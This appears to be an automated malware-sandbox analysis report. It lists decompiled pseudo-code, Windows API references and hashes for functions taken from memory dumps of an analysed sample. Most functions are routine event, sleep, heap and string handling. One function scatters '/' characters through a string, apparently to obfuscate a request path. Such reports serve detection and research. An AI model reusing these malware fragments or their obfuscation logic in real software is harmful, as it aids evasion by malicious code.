Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 8cabb036c8f64386b6a72e32e61bf84638cf0ca643bacd5227fbaf5edf85172f
Instruction ID: b4dfd33004e4b23669e0510d5656f60ad342501a6d885d33cf3aa456a36031ac
Opcode Fuzzy Hash: 8cabb036c8f64386b6a72e32e61bf84638cf0ca643bacd5227fbaf5edf85172f
Instruction Fuzzy Hash: D2210132EA03519BCF325E689C84B6B739DEFD8B24B250B25F957DB101DB31CE018A80

Uniqueness

Uniqueness Score: -1.00%

Function 02CE9870, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E02CE9870(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E02CE2931(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E02CE8DAB(_t23);
						}
					}
					return _t38;
				}
				if(E02CE155A(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x2ced2ac, 1, 0,  *0x2ced344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E02CE5BC0(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E02CE4B2A(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E02CE4FF0(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E02CE6150( &_v32, _t39);
					goto L13;
				}
			}

0x02ce9870
0x02ce987d
0x02ce9883
0x02ce9884
0x02ce9885
0x02ce9886
0x02ce9887
0x02ce988b
0x02ce9897
0x02ce989b
0x02ce9923
0x02ce9923
0x02ce9926
0x02ce9928
0x02ce9930
0x02ce9930
0x02ce9936
0x02ce9939
0x02ce9939
0x02ce9936
0x02ce9944
0x02ce9944
0x02ce98ae
0x02ce98b0
0x02ce98b0
0x02ce98c7
0x02ce98cb
0x02ce98ce
0x02ce98d9
0x02ce98e0
0x02ce98e0
0x02ce98e9
0x02ce98ed
0x02ce98fb
0x02ce98ef
0x02ce98ef
0x02ce98f0
0x02ce98f1
0x02ce98f2
0x02ce98f3
0x02ce98f4
0x02ce98f4
0x02ce9900
0x02ce9903
0x02ce9907
0x02ce9909
0x02ce9909
0x02ce9910
0x00000000
0x02ce9912
0x02ce9912
0x02ce991f
0x00000000
0x02ce991f

APIs

CreateEventA.KERNEL32(02CED2AC,00000001,00000000,00000040,00000001,?,76D7F710,00000000,76D7F730,?,?,?,02CE7D37,?,00000001,?), ref: 02CE98C1
SetEvent.KERNEL32(00000000,?,?,?,02CE7D37,?,00000001,?,00000002,?,?,02CE312C,?), ref: 02CE98CE
Sleep.KERNEL32(00000BB8,?,?,?,02CE7D37,?,00000001,?,00000002,?,?,02CE312C,?), ref: 02CE98D9
CloseHandle.KERNEL32(00000000,?,?,?,02CE7D37,?,00000001,?,00000002,?,?,02CE312C,?), ref: 02CE98E0

Part of subcall function 02CE5BC0: WaitForSingleObject.KERNEL32(00000000,?,?,?,02CE9900,?,02CE9900,?,?,?,?,?,02CE9900,?), ref: 02CE5C9A

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: ad0827dcd21379425ac0d28eadb441028fdac5ee89369988927fe6cd91aecd19
Instruction ID: 99dfd791835506e26c6b60455044609717e2edf4c640c5cdedad1aa58cf6a3d8
Opcode Fuzzy Hash: ad0827dcd21379425ac0d28eadb441028fdac5ee89369988927fe6cd91aecd19
Instruction Fuzzy Hash: F821A473D00219EBCF20AFF49884ADE73BDAF94354F054526EA17A7100D7749A45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001C5420, Relevance: 6.1, APIs: 4, Instructions: 84COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32(00000000,00009875,00000000,004D8488,?,004D8488,?,004D8488,?,00386E90,000000FF,?,001C6EF4,?,004D8488), ref: 001C5471
ReleaseSemaphore.KERNEL32(?,?,00000000,?,004D8488,?,00386E90,000000FF,?,001C6EF4,?,004D8488), ref: 001C5494
CloseHandle.KERNEL32(00000000), ref: 001C54C4
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0038C9C0,000000FF), ref: 001C54FE

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ReleaseSemaphore$CloseEventHandle
String ID:
API String ID: 4139662584-0
Opcode ID: 5c14344ed9dca047224b939b2ff31adde240fa8ebb8cf6da6ce6c47b8f447b50
Instruction ID: 159a5281e7bdbf52a0eafb2a11e43be21c9bf71563bd42472ac696b1c3476e7c
Opcode Fuzzy Hash: 5c14344ed9dca047224b939b2ff31adde240fa8ebb8cf6da6ce6c47b8f447b50
Instruction Fuzzy Hash: 3F318C70600A06EFDB14DF29D884F26F7AAFB54354F14462DE818CB690E736FC948BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00366728, Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72c6f9ec522d035caf4249060a832e0f17d87c04efdfce4d91820f5a0ffeb8b2
Instruction ID: bfad682aae95c283e08135e2b92a5d37f6c2b16464fdc13d408d94b01106d7cc
Opcode Fuzzy Hash: 72c6f9ec522d035caf4249060a832e0f17d87c04efdfce4d91820f5a0ffeb8b2
Instruction Fuzzy Hash: F3210D71A01624BBCB335B24DC82A6A775C9F017E8F268525ED15AB699D730ED00C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 02CE5F58, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E02CE5F58(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E02CE1525(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x02ce5f64
0x02ce5f68
0x02ce5f69
0x02ce5f6a
0x02ce5f6c
0x02ce5f6e
0x02ce5f71
0x02ce5f76
0x02ce600d
0x02ce6014
0x02ce6014
0x02ce5f7f
0x02ce5f86
0x02ce5f96
0x02ce5f96
0x02ce5f9c
0x02ce5f9e
0x02ce5fa3
0x02ce5fac
0x02ce5fb2
0x02ce5fb7
0x02ce5fc2
0x02ce5fc6
0x02ce5fc8
0x02ce5fc9
0x02ce5fd2
0x02ce5fd6
0x02ce5fe7
0x02ce5fd8
0x02ce5fdd
0x02ce5fe2
0x02ce5ff1
0x02ce5ff1
0x02ce5fc6
0x02ce5ff7
0x02ce5ffd
0x02ce5ffd
0x02ce6006
0x02ce600b
0x02ce600b
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 02CE5F86
lstrlenW.KERNEL32(?), ref: 02CE5FBC
memcpy.NTDLL(00000000,?,?,?), ref: 02CE5FDD
SysFreeString.OLEAUT32(?), ref: 02CE5FF1

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: ccfe8227b1008dc5245cb9fbadf45a9c59bb7012ea141b8b18f78b0ddf707aaa
Instruction ID: 9af65b7d554aeabb291cf809f586325e38f1f60e56d37ff7ab9e6cfaab88b5fa
Opcode Fuzzy Hash: ccfe8227b1008dc5245cb9fbadf45a9c59bb7012ea141b8b18f78b0ddf707aaa
Instruction Fuzzy Hash: F7214F75901219EFCF11DFA8D88499EBBB9FF48354B104569E946E7200EB31DB00DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00366300, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,00000004,003567A2,00000000,00000000,00000000,?,0036A292,00000000,00000000,?,004EAB34,00000000), ref: 00366305
_free.LIBCMT ref: 00366362
_free.LIBCMT ref: 00366398
SetLastError.KERNEL32(00000000,004D88A0,000000FF,?,0036A292,00000000,00000000,?,004EAB34,00000000), ref: 003663A3

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: ede68e6a42c16778d54fbe08daf0e472b3317c14e4b54ad798ef39400fc0fa42
Instruction ID: 5fe2193a35b8e18cbd8c3834d1e99eb35c458bba06316c0d76fcd653a22b1e06
Opcode Fuzzy Hash: ede68e6a42c16778d54fbe08daf0e472b3317c14e4b54ad798ef39400fc0fa42
Instruction Fuzzy Hash: 5011067A2016406FCB1337B99C87D3B26AD9BD03F5B76C23DF1259A2F9DE618C049114

Uniqueness

Uniqueness Score: -1.00%

Function 00366457, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0035A296,00367E5D,?,?,0034B338,?,?,?,?,?,001BA91D,00348D42,?), ref: 0036645C
_free.LIBCMT ref: 003664B9
_free.LIBCMT ref: 003664EF
SetLastError.KERNEL32(00000000,004D88A0,000000FF,?,0034B338,?,?,?,?,?,001BA91D,00348D42,?,?,00348D42), ref: 003664FA

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: e0b66e7f0074ce505f03706fe472cf8df51c228fad4f6f1741bf57cb3b6c1a49
Instruction ID: 29f581ef1fdd835b5e268cf6b99a2a858560fca3a3cbf19d8bd364a4fcefe3c8
Opcode Fuzzy Hash: e0b66e7f0074ce505f03706fe472cf8df51c228fad4f6f1741bf57cb3b6c1a49
Instruction Fuzzy Hash: A7114872201500AEC71337BAEC87D3B36AD9BD13F0B62C23DF5289A1D9DE218C059120

Uniqueness

Uniqueness Score: -1.00%

Function 6DA86256, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000016,00000000,6DA77140,00000016,?,6DA771A5,00000000,00000000,00000000,00000000,00000000,6DA85B82,00000000,?,6DA68B88), ref: 6DA8625B
_free.LIBCMT ref: 6DA862B8
_free.LIBCMT ref: 6DA862EE
SetLastError.KERNEL32(00000000,00000008,000000FF,?,6DA771A5,00000000,00000000,00000000,00000000,00000000,6DA85B82,00000000,?,6DA68B88,00000000,00000000), ref: 6DA862F9

Memory Dump Source

Source File: 00000011.00000002.530977415.000000006D851000.00000020.00020000.sdmp, Offset: 6D850000, based on PE: true

Associated: 00000011.00000002.530970653.000000006D850000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531353953.000000006DBC5000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531449744.000000006DCB0000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531458292.000000006DCB3000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531465886.000000006DCB7000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531479113.000000006DCC6000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531486995.000000006DCCA000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531496032.000000006DCCB000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: b1226c895e6a6af3a62af9b2557fc2133e29697eeda4ee859ac4bf2b0d997e00
Instruction ID: a539529deba69ae4fea6e199dfc80bcf8d11411b2bd2d611430acd9fbc9cc392
Opcode Fuzzy Hash: b1226c895e6a6af3a62af9b2557fc2133e29697eeda4ee859ac4bf2b0d997e00
Instruction Fuzzy Hash: 15110A32A2C2056BFB0157785D84E2B6279E7C6379B2E0234FE25933D2EB21CC814191

Uniqueness

Uniqueness Score: -1.00%

Function 00354ED8, Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,?,00354F99,000000FF,0039A49A,00000000,?,?,0035504B,00000002,0047255C,004739C8,004739D0), ref: 00354F68

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: afa713f33683ee893a2388e8f6e3f9537c992d6040927f61c6e62e15928fcf27
Instruction ID: 04348cb2268f185f6b8663336e9857c37e7f514a19a30b834d7b892533c1c95f
Opcode Fuzzy Hash: afa713f33683ee893a2388e8f6e3f9537c992d6040927f61c6e62e15928fcf27
Instruction Fuzzy Hash: 50112932A04221ABCF274B6CEC41F9D7398AF01776F220161FD24EB2A0D771ED4486D1

Uniqueness

Uniqueness Score: -1.00%

Function 02CEA41C, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02CEA41C(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x2ced238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x2ced250; // 0xd89a0d51
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x2ced250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x02cea424
0x02cea427
0x02cea42d
0x02cea445
0x02cea447
0x02cea44c
0x02cea44e
0x02cea451
0x02cea453
0x02cea456
0x02cea458
0x02cea458
0x02cea45a
0x02cea465
0x02cea46a
0x02cea47b
0x02cea483
0x02cea488
0x02cea48b
0x02cea48e
0x02cea490
0x02cea493
0x02cea496
0x02cea496
0x02cea499
0x02cea4a4
0x02cea4a9
0x02cea4b3

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02CE7C20,00000000,?,?,02CE9DA0,?,03BA95B0), ref: 02CEA427
RtlAllocateHeap.NTDLL(00000000,?), ref: 02CEA43F
memcpy.NTDLL(00000000,?,-00000008,?,?,?,02CE7C20,00000000,?,?,02CE9DA0,?,03BA95B0), ref: 02CEA483
memcpy.NTDLL(00000001,?,00000001), ref: 02CEA4A4

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: e345359ca0e395534e33caa0931b3ee5983492bb80ac78f5aaf591c5d9caf498
Instruction ID: 429511dacecb1552d916e2b17d21bbc2398645cd17de77523f773b748e336c72
Opcode Fuzzy Hash: e345359ca0e395534e33caa0931b3ee5983492bb80ac78f5aaf591c5d9caf498
Instruction Fuzzy Hash: 9911E972A40214AFCB148A69DC88E9EBFEFDFC4361B050276F905DB140E7709E14D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 02CE8C01, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02CE8C01(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x02ce8c0b
0x02ce8c0f
0x02ce8c24
0x02ce8c26
0x02ce8c2b
0x02ce8c31
0x02ce8c33
0x02ce8c38
0x02ce8c43
0x02ce8c3a
0x02ce8c3a
0x02ce8c3a
0x02ce8c38
0x02ce8c51

APIs

memset.NTDLL ref: 02CE8C0F
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,76D681D0), ref: 02CE8C24
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 02CE8C31
CloseHandle.KERNEL32(?), ref: 02CE8C43

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 78d921d8b21b7e83b896f39871aa4a2bf856068dbb0667d33cd75424d0466910
Instruction ID: e528ff85177b4ba20676d98dceaa07a8f6cd07737093120af98696723764ec3e
Opcode Fuzzy Hash: 78d921d8b21b7e83b896f39871aa4a2bf856068dbb0667d33cd75424d0466910
Instruction Fuzzy Hash: 86F089B550570CBFD7245F26DCC4C27BB9CEB8219D7114E2EF14381511C672A9598AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00374692, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,?,0037297C,00000000,00000001,00000000,?,?,00000000,00000000,00000000,00000000), ref: 003746A9
GetLastError.KERNEL32(?,0037297C,00000000,00000001,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?), ref: 003746B5

Part of subcall function 0037467B: CloseHandle.KERNEL32(004D8FE0,003746C5,?,0037297C,00000000,00000001,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0037468B

___initconout.LIBCMT ref: 003746C5

Part of subcall function 0037463D: CreateFileW.KERNEL32(0047FBF8,40000000,00000003,00000000,00000003,00000000,00000000,0037466C,00372969,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00374650

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0037297C,00000000,00000001,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 003746DA

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 8bb2b7a87f624de0c529391f5987f28217bcaedca77b576de4232da43d604049
Instruction ID: 951cb11404117b509a6d0fac399d6ed32fc3092c3bd0392a8bab669ad9296e21
Opcode Fuzzy Hash: 8bb2b7a87f624de0c529391f5987f28217bcaedca77b576de4232da43d604049
Instruction Fuzzy Hash: 7BF03036040224BBCF231F92ED05DAE7F6BFF493A0F058019FA1C86230CB3298209B94

Uniqueness

Uniqueness Score: -1.00%

Function 02CE4DB1, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02CE4DB1() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x2ced26c; // 0x2c0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x2ced2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x2ced26c; // 0x2c0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x2ced238; // 0x37b0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x02ce4db1
0x02ce4db8
0x02ce4e02
0x02ce4e04
0x02ce4e04
0x02ce4dbc
0x02ce4dc2
0x02ce4dc7
0x02ce4dcb
0x02ce4dd1
0x02ce4dd8
0x00000000
0x00000000
0x02ce4dda
0x02ce4ddf
0x00000000
0x00000000
0x00000000
0x02ce4ddf
0x02ce4de1
0x02ce4de9
0x02ce4dec
0x02ce4dec
0x02ce4df2
0x02ce4df9
0x02ce4dfc
0x02ce4dfc
0x00000000

APIs

SetEvent.KERNEL32(000002C0,00000001,02CE7F41), ref: 02CE4DBC
SleepEx.KERNEL32(00000064,00000001), ref: 02CE4DCB
CloseHandle.KERNEL32(000002C0), ref: 02CE4DEC
HeapDestroy.KERNEL32(037B0000), ref: 02CE4DFC

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 8f16959faee61d3b3b51ea668397451b761688570565abac20a911a35193352a
Instruction ID: 5b62944867f2908a455f8407f5b191af8c0e4d6ebe364a103686c656ec93cf78
Opcode Fuzzy Hash: 8f16959faee61d3b3b51ea668397451b761688570565abac20a911a35193352a
Instruction Fuzzy Hash: 70F01C71E81312DBDE34AA75D848F0B3A9CAB44761B044B10B912DB281CB61DF5096A0

Uniqueness

Uniqueness Score: -1.00%

Function 02CE9FF6, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E02CE9FF6() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x2ced32c; // 0x3ba95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x2ced32c; // 0x3ba95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x2ced32c; // 0x3ba95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x2cee81a) {
					HeapFree( *0x2ced238, 0, _t10);
					_t7 =  *0x2ced32c; // 0x3ba95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x02ce9ff6
0x02ce9fff
0x02cea00f
0x02cea00f
0x02cea014
0x02cea019
0x00000000
0x00000000
0x02cea009
0x02cea009
0x02cea01b
0x02cea020
0x02cea024
0x02cea037
0x02cea03d
0x02cea03d
0x02cea046
0x02cea048
0x02cea04c
0x02cea052

APIs

RtlEnterCriticalSection.NTDLL(03BA9570), ref: 02CE9FFF
Sleep.KERNEL32(0000000A,?,02CE30F3), ref: 02CEA009
HeapFree.KERNEL32(00000000,?,?,02CE30F3), ref: 02CEA037
RtlLeaveCriticalSection.NTDLL(03BA9570), ref: 02CEA04C

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 39daa574f8521b8da48cdf9f32a90d00d570e59e7d39d1f60dea388b2dcb921c
Instruction ID: b1247aa47dc816419dfdb5dd83c947c5b4c78485b82a88af901503dd2437e1cd
Opcode Fuzzy Hash: 39daa574f8521b8da48cdf9f32a90d00d570e59e7d39d1f60dea388b2dcb921c
Instruction Fuzzy Hash: CAF0D475A80241DFEF188B65D889F2A77F8AB48354B048A09F907CF250C735AD20CA50

Uniqueness

Uniqueness Score: -1.00%

Function 003659BD, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00365A4D

Strings

pow, xrefs: 00365A25, 00365A42

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: f4db6da1ef19b5b80b5ce6f84f2b97672e4604d16b732273172809b1e6a7fd1d
Instruction ID: c89dd376939a7d904f177e6718f1bdb0455415e988fc34ec26543ef92101fed1
Opcode Fuzzy Hash: f4db6da1ef19b5b80b5ce6f84f2b97672e4604d16b732273172809b1e6a7fd1d
Instruction Fuzzy Hash: 4D518E61914606D6CB3B7B54CD813693BA4DF50710F32CB78E0DD8A2EDEB398CD4964A

Uniqueness

Uniqueness Score: -1.00%

Function 001EA0E0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 192COMMON

Download Yara Rule

APIs

Part of subcall function 001F0A60: ___std_exception_copy.LIBVCRUNTIME ref: 001F0AAB

___std_exception_destroy.LIBVCRUNTIME ref: 001EA368

Part of subcall function 00346EC2: RtlEnterCriticalSection.NTDLL(004E9A1C), ref: 00346ECD
Part of subcall function 00346EC2: RtlLeaveCriticalSection.NTDLL(004E9A1C), ref: 00346F0A

__Init_thread_footer.LIBCMT ref: 001EA324

Strings

